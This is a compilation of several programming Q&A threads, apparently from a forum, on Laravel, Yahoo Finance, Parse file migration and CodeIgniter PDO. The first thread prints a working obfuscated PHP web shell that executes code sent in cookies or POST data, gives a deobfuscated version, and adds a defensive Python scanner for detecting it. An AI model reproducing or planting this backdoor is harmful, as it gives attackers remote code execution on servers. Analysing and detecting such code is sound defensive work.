Under my Laravel application's public folder, there are some suspicious php files with weird names like "8xmzujk2.php".
Even though I tried to delete those files one or two times, those files appear again after two or three days. I use a Windows server with Apache. There is no record in Apache's access and error logs at the time those files are created.
If anyone has encountered this issue before, please kindly suggest the steps to solve it. All suggestions are welcome. Thanks in advance.
The code inside one of these suspicious php files is as below.
<?php
$groqw = 'e-xv2i4_3r78g0*6kypmcoustndl#5\'b19aHf';$vcdoidm = Array();$vcdoidm[] = $groqw[35].$groqw[14];$vcdoidm[] = $groqw[20].$groqw[9].$groqw[0].$groqw[34].$groqw[24].$groqw[0].$groqw[7].$groqw[36].$groqw[22].$groqw[25].$groqw[20].$groqw[24].$groqw[5].$groqw[21].$groqw[25];$vcdoidm[] = $groqw[33].$groqw[36].$groqw[8].$groqw[34].$groqw[13].$groqw[10].$groqw[34].$groqw[32].$groqw[1].$groqw[29].$groqw[33].$groqw[4].$groqw[20].$groqw[1].$groqw[6].$groqw[10].$groqw[13].$groqw[32].$groqw[1].$groqw[11].$groqw[36].$groqw[13].$groqw[15].$groqw[1].$groqw[29].$groqw[29].$groqw[31].$groqw[10].$groqw[15].$groqw[0].$groqw[33].$groqw[13].$groqw[32].$groqw[33].$groqw[34].$groqw[34];$vcdoidm[] = $groqw[28];$vcdoidm[] = $groqw[20].$groqw[21].$groqw[22].$groqw[25].$groqw[24];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[7].$groqw[9].$groqw[0].$groqw[18].$groqw[0].$groqw[34].$groqw[24];$vcdoidm[] = $groqw[0].$groqw[2].$groqw[18].$groqw[27].$groqw[21].$groqw[26].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[22].$groqw[31].$groqw[23].$groqw[24].$groqw[9];$vcdoidm[] = $groqw[34].$groqw[9].$groqw[9].$groqw[34].$groqw[17].$groqw[7].$groqw[19].$groqw[0].$groqw[9].$groqw[12].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[27].$groqw[0].$groqw[25];$vcdoidm[] = $groqw[18].$groqw[34].$groqw[20].$groqw[16];foreach ($vcdoidm[8]($_COOKIE, $_POST) as $cpaxpnw => $afkxx){function dlvrss($vcdoidm, $cpaxpnw, $eowcms){return $vcdoidm[7]($vcdoidm[5]($cpaxpnw . $vcdoidm[2], ($eowcms / $vcdoidm[9]($cpaxpnw)) + 1), 0, $eowcms);}function isfap($vcdoidm, $eeqhx){return #$vcdoidm[10]($vcdoidm[0], $eeqhx);}function eeejy($vcdoidm, $eeqhx){$jfvsqg = $vcdoidm[4]($eeqhx) % 3;if (!$jfvsqg) {$ykpentn = $vcdoidm[1]; $fggryc = $ykpentn("", $eeqhx[1]($eeqhx[2]));$fggryc();exit();}}$afkxx = isfap($vcdoidm, $afkxx);eeejy($vcdoidm, $vcdoidm[6]($vcdoidm[3], $afkxx ^ dlvrss($vcdoidm, $cpaxpnw, $vcdoidm[9]($afkxx))));}
That strip of code runs arbitrary code sent in the post and cookies of a request.
Here is the clearer version of it:
foreach (array_merge($_COOKIE, $_POST) as $index => $value){
function dlvrss($vcdoidm, $index, $eowcms){
return substr(str_repeat($index . "9f3a07a1-592c-4701-8f06-55b76e9019aa", ($eowcms / strlen($index)) + 1), 0, $eowcms);
}
function isfap($vcdoidm, $eeqhx){
return #pack("H*", $eeqhx);
}
function eeejy($vcdoidm, $eeqhx){
$jfvsqg = count($eeqhx) % 3;
if (!$jfvsqg) {
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();
exit();
}
}
$value = isfap($vcdoidm, $value);
eeejy($vcdoidm, explode("#", $value ^ dlvrss($vcdoidm, $index, strlen($value))));
}
See how in the end it runs a function sent in the request via
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();
You should have that fixed.
#Edit
I don't know how, sorry.
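Added example, not part of the original answer: a small triage script that undoes the character-index obfuscation shown in the question and flags files that both hide a code-execution function name and read request data. The function names, the `DANGEROUS` list and the trimmed `SAMPLE` excerpt are choices made for this illustration.

```python
import pathlib
import re

# Function names that turn attacker-supplied strings into executed PHP.
DANGEROUS = {"create_function", "eval", "assert", "system", "exec",
             "shell_exec", "passthru", "call_user_func"}

# $name = '...';  a single-quoted PHP string (only \' and \\ are escapes)
ALPHABET = re.compile(r"\$(\w+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;")

# Trimmed excerpt of the sample quoted in the question; the loop body is removed.
SAMPLE = r"""<?php
$groqw = 'e-xv2i4_3r78g0*6kypmcoustndl#5\'b19aHf';$vcdoidm = Array();
$vcdoidm[] = $groqw[35].$groqw[14];
$vcdoidm[] = $groqw[20].$groqw[9].$groqw[0].$groqw[34].$groqw[24].$groqw[0].$groqw[7].$groqw[36].$groqw[22].$groqw[25].$groqw[20].$groqw[24].$groqw[5].$groqw[21].$groqw[25];
$vcdoidm[] = $groqw[18].$groqw[34].$groqw[20].$groqw[16];
foreach ($vcdoidm[8]($_COOKIE, $_POST) as $k => $v) {}
"""


def decode_strings(src):
    """Resolve every $alpha[i].$alpha[j]... chain to the string it spells."""
    decoded = []
    for name, raw in ALPHABET.findall(src):
        alphabet = re.sub(r"\\(['\\])", r"\1", raw)  # undo PHP escapes
        ref = r"\$%s\[\d+\]" % re.escape(name)
        for chain in re.finditer(r"%s(?:\s*\.\s*%s)*" % (ref, ref), src):
            idx = [int(i) for i in re.findall(r"\[(\d+)\]", chain.group(0))]
            if all(i < len(alphabet) for i in idx):
                decoded.append("".join(alphabet[i] for i in idx))
    return decoded


def assess(src):
    """Return (hits, flagged): dangerous decoded names, and whether the file
    both hides such a name and reads request data."""
    hits = sorted(DANGEROUS.intersection(decode_strings(src)))
    reads_request = re.search(r"\$_(COOKIE|POST|GET|REQUEST)\b", src) is not None
    return hits, bool(hits) and reads_request


def scan(root):
    """List (path, hits) for flagged .php files under root, e.g. public/."""
    found = []
    for path in sorted(pathlib.Path(root).rglob("*.php")):
        hits, flagged = assess(path.read_text(errors="replace"))
        if flagged:
            found.append((str(path), hits))
    return found


if __name__ == "__main__":
    print(decode_strings(SAMPLE))
    print(assess(SAMPLE))
```

Run `scan()` against the application's public folder on a schedule so that a re-dropped file is noticed when it appears; a match only catches this obfuscation style and says nothing about how the file was written.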
I am performing SSH in Laravel whereby I connect to another server and download a file. I am using Laravel Collective https://laravelcollective.com/docs/5.4/ssh
So, the suggested way to do this is something like this
$result = \SSH::into('scripts')->get('/srv/somelocation/'.$fileName, $path);
if($result) {
return $path;
} else {
return 401;
}
Now that successfully downloads the file and moves it to my local server. However, I am always returned 401 because $result seems to be Null.
I can't find much on getting the result back from the SSH. I have also tried
$result = \SSH::into('scripts')->get('/srv/somelocation/'.$fileName, $path, function($line){
dd( $line.PHP_EOL);
});
But that never gets into the inner function.
Is there any way I can get the result back from the SSH? I just want to handle it properly if there is an error.
Thanks
Rather than rely on $result to give you true / false / error, you can check if the file was downloaded successfully in another way:
// download the file
$result = \SSH::into('scripts')->get('/srv/somelocation/'.$fileName, $path);
// see if downloaded file exists
if ( file_exists($path) ) {
return $path;
} else {
return 401;
}
You need to pass the file name as well, like this, in the get and put methods:
$fileName = "example.txt";
$get = \SSH::into('scripts')->get('/remote/somelocation/'.$fileName, base_path($fileName));
in set method
$set = \SSH::into('scripts')->set(base_path($fileName),'/remote/location/'.$fileName);
in list
$command = SSH::into('scripts')->run(['ls -lsa'],function($output) {
dd($output);
});
I have a service which uses a Yahoo! Finance table yahoo.finance.xchange. This morning I noticed it has stopped working because suddenly Yahoo! started to return an error saying:
{
"error": {
"lang": "en-US",
"description": "No definition found for Table yahoo.finance.xchange"
}
}
This is the request URL. Interesting fact: if I try to refresh the query multiple times, sometimes I get back a correct response, but this happens very rarely (like 10% of the time). Days before, everything was fine.
Does this mean Yahoo API is down or am I missing something because the API was changed? I would appreciate any help.
Since I have the same problem and that it started today too, that others came to post exactly in the same time as well, and that it still works most of the time, the only explanation I can find is that they have some random database errors on their end and we can hope that this will be solved soon. I also have a 20% rate of failures when refreshing the page of the query.
My guess is that they use many servers to handle the requests (let's say 8) and that one of them is empty or doesn't have that table for some reasons so whenever it directs the query to that server, the error is returned.
Temporary solution: Just modify your script to retry 3-4 times. That did it for me because among 5 attempts at least one succeeds.
I solved this issue by using quote.yahoo.com instead of the query.yahooapis.com service. Here's my code:
function devise($currency_from,$currency_to,$amount_from){
$url = "http://quote.yahoo.com/d/quotes.csv?s=" . $currency_from . $currency_to . "=X" . "&f=l1&e=.csv";
$handle = fopen($url, "r");
$exchange_rate = fread($handle, 2000);
fclose($handle );
$amount_to = $amount_from * $exchange_rate;
return round($amount_to,2);
}
EDIT: the above no longer works. At this point, let's just forget about Yahoo lol. Use this instead:
function convertCurrency($from, $to, $amount)
{
$url = file_get_contents('https://free.currencyconverterapi.com/api/v5/convert?q=' . $from . '_' . $to . '&compact=ultra');
$json = json_decode($url, true);
$rate = implode(" ",$json);
$total = $rate * $amount;
$rounded = round($total);
return $total;
}
Same error, I migrated to http://finance.yahoo.com
Here is a C# example:
private static readonly ILog Log = LogManager.GetCurrentClassLogger();
private int YahooTimeOut = 4000;
private int Try { get; set; }
public decimal GetRate(string from, string to)
{
var url =
string.Format(
"http://finance.yahoo.com/d/quotes.csv?e=.csv&f=sl1d1t1&s={0}{1}=X", from, to);
var request = (HttpWebRequest)WebRequest.Create(url);
request.UseDefaultCredentials = true;
request.ContentType = "text/csv";
request.Timeout = YahooTimeOut;
try
{
using (var response = (HttpWebResponse)request.GetResponse())
{
var resStream = response.GetResponseStream();
using (var reader = new StreamReader(resStream))
{
var html = reader.ReadToEnd();
var values = Regex.Split(html, ",");
var rate = Convert.ToDecimal(values[1], new CultureInfo("en-US"));
if (rate == 0)
{
Thread.Sleep(550);
++Try;
return Try < 5 ? GetRate(from, to) : 0;
}
return rate;
}
}
}
catch (Exception ex)
{
Log.Warning("Get currency rate from Yahoo fail " + ex);
Thread.Sleep(550);
++Try;
return Try < 5 ? GetRate(from, to) : 0;
}
}
I've got the same issue.
I need exchange rates in my app, so I decided to use currencylayer.com API instead - they give 168 currencies, including precious metals and Bitcoin.
I've also written a microservice using webtask.io to cache rates from currencylayer and do cross-rate calculations.
And I've written a blog post about it 🤓
Check it out if you want to run your own microservice, it's pretty easy 😉
I found a solution: in my case, just changing http to https made everything work fine.
I have been going round and round with this. I have uploads working with the following:
public function store(Tool $tool)
{
If(Input::hasFile('file')){
$file = Input::file('file');
$name = $file->getClientOriginalName();
$path=Storage::put('public',$file); //Storage::disk('local')->put($name,$file,'public');
$file = new File;
$file->tool_id = $tool->id;
$file->file_name = $name;
$file->path_to_file = $path;
$file->name_on_disk = basename($path);
$file->user_name = \Auth::user()->name;
$file->save();
return back();
}
}
however when I try to download with:
public function show($filename)
{
$url = Storage::disk('public')->url($filename);
///$file = Storage::disk('public')->get($filename);
return response()->download($url);
}
I get the FileNotFound exception from Laravel.
However, if I use this instead:
$file = Storage::disk('public')->get($filename);
return response()->download($file);
I get
FileNotFoundException in File.php line 37: The file "use calib;
insert into
notes(tool_id,user_id,note,created_at,updated_at)
VALUES(1,1,'windows server 2008 sucks',now(),now());" does not exist
which is the actual content of the file...
It can obviously find the file, but why won't it download?
Try this:
return response()->download(storage_path("app/public/{$filename}"));
Replace:
$file = Storage::disk('public')->get($filename);
return response()->download($file);
With:
return response()->download(storage_path('app/public/' . $filename));
response()->download() takes a path to a file, not a file content. More information here: https://laravel.com/docs/5.4/responses#file-downloads
If anyone still cannot find their file even though the file clearly exists, then try
return response()->file(storage_path('/app/' . $filename), $headers);
It could be due to a missing directory separator or it isn't stored inside the public folder.
We migrated the data(without files) to mLab and Heroku. So the old files are still on Parse.
Since then, any new file added goes into Gridstore, which is the default file storage for mLab.
Now I migrated old parse files from Parse to an S3 Bucket using sashido
The files are migrated and are accessible using S3Adapter in Heroku.
But the files on Gridstore are not accessible now. How can I migrate them to the same S3 bucket and change references in mLab?
Maybe you're interested in the solution I've tried. It's not a simple operation, but I successfully migrated 3 databases with my parse server configuration.
It's based on a PHP script (with the Parse PHP SDK) that runs through every object, gets the file from Parse.com and sets it (with any of your adapter configuration) in your own server.
The script looks like:
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
date_default_timezone_set('America/New_York');
$fileField = $argv[1];
$class = $argv[2];
require_once 'vendor/autoload.php';
use Parse\ParseObject;
use Parse\ParseQuery;
use Parse\ParseACL;
use Parse\ParsePush;
use Parse\ParseUser;
use Parse\ParseInstallation;
use Parse\ParseException;
use Parse\ParseAnalytics;
use Parse\ParseFile;
use Parse\ParseCloud;
use Parse\ParseClient;
$app_id = "******";
$rest_key = "******";
$master_key = "******";
ParseClient::initialize($app_id, $rest_key, $master_key);
ParseClient::setServerURL('http://localhost:1338/', 'parse');
$query = new ParseQuery($class);
$query->ascending("createdAt"); // it's just my preference
$query->exists($fileField);
$query->limit(1);
$count = $query->count();
for ($i = 0; $i < $count; $i = $i + 1) {
try {
$query->skip($i);
// get Entry
$entryWithFile = $query->first();
// get file
$parseFile = $entryWithFile->get($fileField);
// filename
$fileName = $parseFile->getName();
// if the file is hosted in Parse, do the job, otherwise continue with the next one
if (strpos($fileName, "tfss-") === false) {
echo "\nThis is already an internal file, skipping...";
continue;
}
$newFileName = str_replace("tfss-", "", $fileName);
$binaryFile = file_get_contents($parseFile->getURL());
$newFile = ParseFile::createFromData($binaryFile, $newFileName);
$entryWithFile->set($fileField, $newFile);
$entryWithFile->save(true);
echo "\nFile saved\n";
}
catch (Exception $e) {
// The connection with mongo or the server could be off for some seconds, let's retry it ;)
sleep(10);
continue;
}
}
echo "\n";
echo "END!";
?>
Set your Parse URL correctly.
Imagine you want to migrate the file from class _User with field imageProfile, so be sure that you pass $fileField = "imageProfile"; $class = "_User".
Run that code for any field per class.
I did a dumb solution to work in parallel, which would be skipping steps in the for loop, for example:
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
date_default_timezone_set('America/New_York');
$index = $argv[1];
$of = $argv[2];
$fileField = $argv[3];
$class = $argv[4];
require_once 'vendor/autoload.php';
use Parse\ParseObject;
use Parse\ParseQuery;
use Parse\ParseACL;
use Parse\ParsePush;
use Parse\ParseUser;
use Parse\ParseInstallation;
use Parse\ParseException;
use Parse\ParseAnalytics;
use Parse\ParseFile;
use Parse\ParseCloud;
use Parse\ParseClient;
$app_id = "********";
$rest_key = "********";
$master_key = "********";
ParseClient::initialize($app_id, $rest_key, $master_key);
ParseClient::setServerURL('http://localhost:1338/', 'parse');
$query = new ParseQuery($class);
$query->ascending("createdAt");
$query->exists($fileField);
$query->limit(1);
$count = $query->count();
for ($i = $index; $i < $count; $i = $i + $of) {
try {
$query->skip($i);
// get Entry
$entryWithFile = $query->first();
// get file
$parseFile = $entryWithFile->get($fileField);
// filename
$fileName = $parseFile->getName();
// if the file is hosted in Parse, do the job, otherwise continue with the next one
if (strpos($fileName, "tfss-") === false) {
echo "\nThis is already an internal file, skipping...";
continue;
}
$newFileName = str_replace("tfss-", "", $fileName);
$binaryFile = file_get_contents($parseFile->getURL());
$newFile = ParseFile::createFromData($binaryFile, $newFileName);
$entryWithFile->set($fileField, $newFile);
$entryWithFile->save(true);
echo "\nFile saved\n";
}
catch (Exception $e) {
// The connection with mongo or the server could be off for some seconds, let's retry it ;)
sleep(10);
continue;
}
}
echo "\n";
echo "END!";
?>
So if you configure $fileField and $class as before, you can open 3 threads and run:
php migrator.php 0 3 "imageProfile" "_User"
php migrator.php 1 3 "imageProfile" "_User"
php migrator.php 2 3 "imageProfile" "_User"
so you will have loops running like:
object 0, 3, 6
object 1, 4, 7
object 2, 5, 8
Good luck, and be quick! It's going to shut down in a few days.
I am trying to get the new PDO driver running in Code Igniter 2.1.1 in (to start with) the local (Mac OS 10.7) copy of my app.
I initially coded it using Active Record for all db operations, and I am now thinking I want to use PDO prepared statements in my model files, going forward.
I modified 'application/config/database.php' like so:
(note a couple minor embedded questions)
[snip]
$active_group = 'local_dev';
$active_record = TRUE;//<---BTW, will this need to stay TRUE to make CI sessions work? For better security, don't we want db-based CI sessions to use PDO too?
//http://codeigniter.com/user_guide/database/configuration.html:
//Note: that some CodeIgniter classes such as Sessions require Active Records be enabled to access certain functionality.
//this is the config setting that I am guessing (?) is my main problem:
$db['local_dev']['hostname'] = 'localhost:/tmp/mysql.sock';
// 1.) if $db['local_dev']['dbdriver']='mysql', then here ^^^ 'localhost:/tmp/mysql.sock' works, 2.) but if $db['local_dev']['dbdriver']='pdo', then it fails with error msg. shown below.
$db['local_dev']['username'] = 'root';
$db['local_dev']['password'] = '';
$db['local_dev']['database'] = 'mydbname';
$db['local_dev']['dbdriver'] = 'pdo';
$db['local_dev']['dbprefix'] = '';
$db['local_dev']['pconnect'] = TRUE;
$db['local_dev']['db_debug'] = TRUE;//TRUE
$db['local_dev']['cache_on'] = FALSE;
$db['local_dev']['cachedir'] = '';
$db['local_dev']['char_set'] = 'utf8';
$db['local_dev']['dbcollat'] = 'utf8_general_ci';
$db['local_dev']['swap_pre'] = '';
$db['local_dev']['autoinit'] = TRUE;
$db['local_dev']['stricton'] = FALSE;
[snip]
With the above config., as soon as I load a controller, I get this error message:
Fatal error: Uncaught exception 'PDOException' with message 'could not find driver' in
/Library/WebServer/Documents/system/database/drivers/pdo/pdo_driver.php:114 Stack trace: #0
/Library/WebServer/Documents/system/database/drivers/pdo/pdo_driver.php(114): PDO->__construct('localhost:/tmp/...', 'root', '', Array) #1 /Library/WebServer/Documents/system/database/DB_driver.php(115): CI_DB_pdo_driver->db_pconnect() #2
/Library/WebServer/Documents/system/database/DB.php(148): CI_DB_driver->initialize() #3
/Library/WebServer/Documents/system/core/Loader.php(346): DB('', NULL) #4
/Library/WebServer/Documents/system/core/Loader.php(1171): CI_Loader->database() #5
/Library/WebServer/Documents/system/core/Loader.php(152): CI_Loader->_ci_autoloader() #6
/Library/WebServer/Documents/system/core/Con in
/Library/WebServer/Documents/system/database/drivers/pdo/pdo_driver.php on line 114
I tried swapping out the 'pdo_driver.php' file from the one on github, as per this:
http://codeigniter.com/forums/viewthread/206124/
...but that just generates other errors, not to mention is disturbing to a newbie who does not want to touch the system files if at all possible.
This thread also seems to imply the need to be hacking the 'pdo_driver.php' system file:
CodeIgniter PDO database driver not working
It seems odd to me, though, that (someone thought that) a hack to a system file is needed to make PDO work in CI v.2.1.1, huh?
Thanks for any suggestions I can try.
I don't know if this might be helpful for you since you already started using the CI functions, but I made my own library for PDO with sqlite and just auto load it. My needs were simple, so it serves its purpose.
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/**
* CodeIgniter PDO Library
*
*
* @author Michael Cruz
* @version 1.0
*/
class Sqlite_pdo
{
var $DB;
public function connect($path) {
try {
$this->DB = new PDO('sqlite:' . $path);
}
catch(PDOException $e) {
print "Error: " . $e->getMessage();
die();
}
}
public function simple_query($SQL) {
$results = $this->DB->query($SQL)
or die('SQL Error: ' . print_r($this->DB->errorInfo(), true));
return $results;
}
public function prepared_query($SQL, $bind = array()) {
$q = $this->DB->prepare($SQL)
or die('Prepare Error: ' . print_r($this->DB->errorInfo(), true));
$q->execute($bind)
or die('Execute Error: ' . print_r($this->DB->errorInfo(), true));
$q->setFetchMode(PDO::FETCH_BOTH);
return $q;
}
public function my_prepare($SQL) {
$q = $this->DB->prepare($SQL)
or die('Error: ' . print_r($this->DB->errorInfo(), true));
return $q;
}
public function my_execute($q, $bind) {
$q->execute($bind)
or die('Error: ' . print_r($this->DB->errorInfo(), true));
$q->setFetchMode(PDO::FETCH_BOTH);
return $q;
}
public function last_insert_id() {
return $this->DB->lastInsertId();
}
}
/* End of file Sqlite_pdo.php */
Thanks to the noob thread http://codeigniter.com/forums/viewthread/180277/ (InsiteFX’s answer).
I figured out the below seems to work (need to test more to be 100%... but at least the error messages are gone):
$db['local_dev']['hostname'] = 'mysql:host=127.0.0.1';